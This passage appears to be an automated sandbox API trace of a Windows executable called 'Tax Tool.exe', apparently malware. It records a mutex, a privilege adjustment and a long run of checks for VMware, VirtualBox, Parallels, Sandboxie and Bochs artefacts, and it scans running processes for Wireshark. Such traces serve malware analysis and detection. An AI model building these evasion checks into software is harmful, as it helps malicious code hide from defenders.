lpMultiByteStr=0xe4f810, cbMultiByte=453, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:17] ver=2.2.5, log=0x0000, PID=0x0990, TID=0x07BC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" \r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00140000\r\ncoreData.initFlags=0x0", lpUsedDefaultChar=0x0) returned 452 [0054.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:17] ver=2.2.5, log=0x0000, PID=0x0990, TID=0x07BC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" \r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00140000\r\ncoreData.initFlags=0x0", cchWideChar=452, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 452 [0054.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:17] ver=2.2.5, log=0x0000, PID=0x0990, TID=0x07BC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" \r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00140000\r\ncoreData.initFlags=0x0", cchWideChar=452, lpMultiByteStr=0xe4fa98, cbMultiByte=453, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:17] ver=2.2.5, log=0x0000, PID=0x0990, TID=0x07BC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" \r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00140000\r\ncoreData.initFlags=0x0", lpUsedDefaultChar=0x0) returned 452 [0054.898] GetSystemTime (in: lpSystemTime=0x9af360 | out: lpSystemTime=0x9af360*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x11, wMilliseconds=0x13d)) [0054.898] SystemTimeToFileTime (in: lpSystemTime=0x9af360, lpFileTime=0x9af350 | out: lpFileTime=0x9af350) returned 1 [0054.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tax Tool.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0054.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tax Tool.exe", cchWideChar=12, lpMultiByteStr=0xe4fec8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tax Tool.exe", lpUsedDefaultChar=0x0) returned 12 [0054.899] GetModuleHandleA (lpModuleName="secur32.dll") returned 0x0 [0054.899] LoadLibraryA (lpLibFileName="secur32.dll") returned 0x74350000 [0055.064] LoadLibraryA (lpLibFileName="SSPICLI") returned 0x744e0000 [0055.065] GetProcAddress (hModule=0x744e0000, lpProcName="GetUserNameExW") returned 0x744ec5f0 [0055.065] GetUserNameExW () returned 0x1 [0055.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0055.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0xe4ff48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0055.069] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="8A") returned 2 [0055.069] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="00") returned 2 [0055.069] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="00") returned 2 [0055.069] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="00") returned 2 [0055.069] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="B7") returned 2 [0055.069] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="49") returned 2 [0055.069] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="67") returned 2 [0055.069] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="98") returned 2 [0055.070] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="F6") returned 2 [0055.070] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="14") returned 2 [0055.070] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="59") returned 2 [0055.070] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="35") returned 2 [0055.070] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="AA") returned 2 [0055.070] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="3E") returned 2 [0055.070] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="27") returned 2 [0055.070] wvnsprintfW (in: pszDest=0x9af148, cchDest=6, pszFmt="%02X", arglist=0x9af124 | out: pszDest="60") returned 2 [0055.070] CreateMutexW (lpMutexAttributes=0x15e89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1e0 [0055.071] WaitForSingleObject (hHandle=0x1e0, dwMilliseconds=0xffffffff) returned 0x0 [0055.071] PathRemoveFileSpecW (in: pszPath="" | out: pszPath="") returned 0 [0055.071] PathSkipRootW (pszPath="") returned 0x0 [0055.071] GetFileAttributesW (lpFileName="") returned 0xffffffff [0055.072] CreateDirectoryW (lpPathName="", lpSecurityAttributes=0x0) returned 0 [0055.072] GetCurrentThread () returned 0xfffffffe [0055.072] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x9af3ac | out: TokenHandle=0x9af3ac*=0x0) returned 0 [0055.072] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x9af3ac | out: TokenHandle=0x9af3ac*=0x1ec) returned 1 [0055.072] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x9af3b4 | out: lpLuid=0x9af3b4*(LowPart=0x8, HighPart=0)) returned 1 [0055.073] AdjustTokenPrivileges (in: TokenHandle=0x1ec, DisableAllPrivileges=0, NewState=0x9af3b0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0055.073] GetLastError () returned 0x0 [0055.073] CloseHandle (hObject=0x1ec) returned 1 [0055.074] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0055.074] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0xb0c460, lpbSaclPresent=0x9af3e4, pSacl=0x9af3d8, lpbSaclDefaulted=0x9af3e0 | out: lpbSaclPresent=0x9af3e4, pSacl=0x9af3d8, lpbSaclDefaulted=0x9af3e0) returned 1 [0055.074] SetNamedSecurityInfoW () returned 0x7b [0055.167] LocalFree (hMem=0xb0c460) returned 0x0 [0055.167] GetFileAttributesW (lpFileName="") returned 0xffffffff [0055.170] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.172] wvnsprintfA (in: pszDest=0xe4fb18, cchDest=21, pszFmt="%d", arglist=0x9af348 | out: pszDest="1476366137") returned 10 [0055.173] CreateFileW (lpFileName="", dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0055.176] ReleaseMutex (hMutex=0x1e0) returned 1 [0055.176] CloseHandle (hObject=0x1e0) returned 1 [0055.181] SetLastError (dwErrCode=0x0) [0055.181] LocalFree (hMem=0xb09638) returned 0x0 [0055.181] SetErrorMode (uMode=0x8007) returned 0x0 [0055.181] GetCommandLineW () returned="\"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" " [0055.181] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" ", pNumArgs=0x9afc4c | out: pNumArgs=0x9afc4c) returned 0xb09638*="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe" [0055.182] LocalFree (hMem=0xb09638) returned 0x0 [0055.182] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", NtPathName=0x9af890, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0055.182] NtCreateFile (in: FileHandle=0x9af884, DesiredAccess=0x8, ObjectAttributes=0x9af898*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\desktop\\tax tool.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x9af888, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x40, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x9af884*=0x1e0, IoStatusBlock=0x9af888*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0055.183] NtQueryEaFile (in: FileHandle=0x1e0, IoStatusBlock=0x9af888, Buffer=0xe4f648, Length=0x405, ReturnSingleEntry=1, EaList=0x0, EaListLength=0x0, EaIndex=0x0, RestartScan=0 | out: IoStatusBlock=0x9af888, Buffer=0xe4f648) returned 0xc0000052 [0055.183] NtClose (Handle=0x1e0) returned 0x0 [0055.184] GetCurrentProcess () returned 0xffffffff [0055.184] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x9af648, nSize=0x104 | out: lpFilename="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe") returned 0x30 [0055.184] PathRenameExtensionW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe", pszExt=".dbg" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.dbg") returned 1 [0055.184] PathFileExistsW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.dbg") returned 0 [0055.185] GetModuleHandleA (lpModuleName="user32.dll") returned 0x75dd0000 [0055.185] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0055.185] GetKeyboardLayoutList (in: nBuff=1, lpList=0xe4f648 | out: lpList=0xe4f648) returned 1 [0055.186] GetVersionExW (in: lpVersionInformation=0x9af6fc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x77412709, dwMinorVersion=0x15, dwBuildNumber=0xfe00fe00, dwPlatformId=0x774126bb, szCSDVersion="\x7f") | out: lpVersionInformation=0x9af6fc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0055.186] GetNativeSystemInfo (in: lpSystemInfo=0x9af818 | out: lpSystemInfo=0x9af818*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x3e04)) [0055.194] CreateFileW (lpFileName="\\\\.\\VmGenerationCounter" (normalized: "vmgenerationcounter"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.202] GetLastError () returned 0x2 [0055.208] CreateFileW (lpFileName="\\\\.\\HGFS" (normalized: "hgfs"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.235] GetLastError () returned 0x2 [0055.242] CreateFileW (lpFileName="\\\\.\\vmci" (normalized: "vmci"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.251] GetLastError () returned 0x2 [0055.251] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\VMware, Inc.\\VMware Tools", ulOptions=0x0, samDesired=0x1, phkResult=0x9af7c0 | out: phkResult=0x9af7c0*=0x0) returned 0x2 [0055.258] CreateFileW (lpFileName="\\\\.\\VBoxGuest" (normalized: "vboxguest"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.274] GetLastError () returned 0x2 [0055.281] CreateFileW (lpFileName="\\\\.\\VBoxMouse" (normalized: "vboxmouse"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.483] GetLastError () returned 0x2 [0055.489] CreateFileW (lpFileName="\\\\.\\VBoxVideo" (normalized: "vboxvideo"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.497] GetLastError () returned 0x2 [0055.504] CreateFileW (lpFileName="\\\\.\\VBoxMiniRdDN" (normalized: "vboxminirddn"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.518] GetLastError () returned 0x2 [0055.533] CreateFileW (lpFileName="\\\\.\\VBoxTrayIPC" (normalized: "vboxtrayipc"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.604] GetLastError () returned 0x2 [0055.604] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Oracle\\VirtualBox Guest Additions", ulOptions=0x0, samDesired=0x1, phkResult=0x9af6e0 | out: phkResult=0x9af6e0*=0x0) returned 0x2 [0055.604] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\ACPI\\DSDT\\VBOX__", ulOptions=0x0, samDesired=0x1, phkResult=0x9af6e0 | out: phkResult=0x9af6e0*=0x0) returned 0x2 [0055.604] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="MicrosoftVirtualPC7UserServiceMakeSureWe'reTheOnlyOneMutex") returned 0x1e0 [0055.604] GetLastError () returned 0x0 [0055.604] CloseHandle (hObject=0x1e0) returned 1 [0055.613] CreateFileW (lpFileName="\\\\.\\VirtualMachineServices" (normalized: "virtualmachineservices"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.650] GetLastError () returned 0x2 [0055.675] CreateFileW (lpFileName="\\\\.\\prl_pv" (normalized: "prl_pv"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.691] GetLastError () returned 0x2 [0055.699] CreateFileW (lpFileName="\\\\.\\prl_tg" (normalized: "prl_tg"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.706] GetLastError () returned 0x2 [0055.713] CreateFileW (lpFileName="\\\\.\\prl_time" (normalized: "prl_time"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.722] GetLastError () returned 0x2 [0055.722] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\Description\\System", ulOptions=0x0, samDesired=0x1, phkResult=0x9af7b8 | out: phkResult=0x9af7b8*=0x1e0) returned 0x0 [0055.722] RegQueryValueExW (in: hKey=0x1e0, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x9af834, lpData=0x0, lpcbData=0x9af7c8*=0x0 | out: lpType=0x9af834*=0x7, lpData=0x0, lpcbData=0x9af7c8*=0x22) returned 0x0 [0055.722] RegQueryValueExW (in: hKey=0x1e0, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x9af834, lpData=0xe4f648, lpcbData=0x9af7c8*=0x22 | out: lpType=0x9af834*=0x7, lpData="PTLTD - 6040000\0\0", lpcbData=0x9af7c8*=0x22) returned 0x0 [0055.722] RegCloseKey (hKey=0x1e0) returned 0x0 [0055.722] StrStrIW (lpFirst="PTLTD - 6040000", lpSrch="BOCHS") returned 0x0 [0055.723] CreateFileW (lpFileName="C:\\popupkiller.exe" (normalized: "c:\\popupkiller.exe"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.723] GetLastError () returned 0x2 [0055.723] CreateFileW (lpFileName="C:\\stimulator.exe" (normalized: "c:\\stimulator.exe"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.723] GetLastError () returned 0x2 [0055.723] CreateFileW (lpFileName="C:\\TOOLS\\execute.exe" (normalized: "c:\\tools\\execute.exe"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.724] GetLastError () returned 0x3 [0055.724] LoadLibraryW (lpLibFileName="SbieDll.dll") returned 0x0 [0055.757] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Sandboxie_SingleInstanceMutex_Control") returned 0x1e0 [0055.757] GetLastError () returned 0x0 [0055.758] CloseHandle (hObject=0x1e0) returned 1 [0055.758] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Frz_State") returned 0x1e0 [0055.758] GetLastError () returned 0x0 [0055.758] CloseHandle (hObject=0x1e0) returned 1 [0055.765] CreateFileW (lpFileName="\\\\.\\NPF_NdisWanIp" (normalized: "npf_ndiswanip"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.772] GetLastError () returned 0x2 [0055.773] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0055.801] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.802] StrStrIW (lpFirst="[System Process]", lpSrch="wireshark") returned 0x0 [0055.802] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.806] StrStrIW (lpFirst="System", lpSrch="wireshark") returned 0x0 [0055.806] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.807] StrStrIW (lpFirst="smss.exe", lpSrch="wireshark") returned 0x0 [0055.807] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.807] StrStrIW (lpFirst="csrss.exe", lpSrch="wireshark") returned 0x0 [0055.808] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.808] StrStrIW (lpFirst="wininit.exe", lpSrch="wireshark") returned 0x0 [0055.808] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.809] StrStrIW (lpFirst="csrss.exe", lpSrch="wireshark") returned 0x0 [0055.809] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.809] StrStrIW (lpFirst="winlogon.exe", lpSrch="wireshark") returned 0x0 [0055.810] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.810] StrStrIW (lpFirst="services.exe", lpSrch="wireshark") returned 0x0 [0055.810] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.811] StrStrIW (lpFirst="lsass.exe", lpSrch="wireshark") returned 0x0 [0055.811] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.811] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.811] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.826] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.826] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0055.826] StrStrIW (lpFirst="dwm.exe", lpSrch="wireshark") returned 0x0 [0055.826] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.827] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.827] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.828] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.828] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.828] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.828] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.829] StrStrIW (lpFirst="svchost.exe", lpSrch="wireshark") returned 0x0 [0055.829] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5d4 | out: lppe=0x9af5d4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.830] StrStrIW 